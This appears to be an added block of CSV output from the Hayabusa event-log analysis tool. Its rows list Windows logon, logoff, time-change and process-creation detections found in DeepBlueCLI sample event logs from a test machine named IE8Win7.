+2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x24902  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x24936  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x19489  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x194bb  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x19153  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1917f  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x2b15e  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x2b18a  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x25519  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x2553c  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser  :  Target User: rdavis  :  IP Address: -  :  Process:   :  Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: -  :  Process: C:\Windows\System32\svchost.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: -  :  Port: -  :  LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: -  :  Process: C:\Windows\System32\lsass.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: -  :  Port: -  :  LogonID: 0x15f53a  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: -  :  Port: -  :  LogonID: 0x15f546  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0xdad4  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0xdafc  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: -  :  Process: C:\Windows\System32\svchost.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: -  :  Port: -  :  LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x4bafc  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x4bb14  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
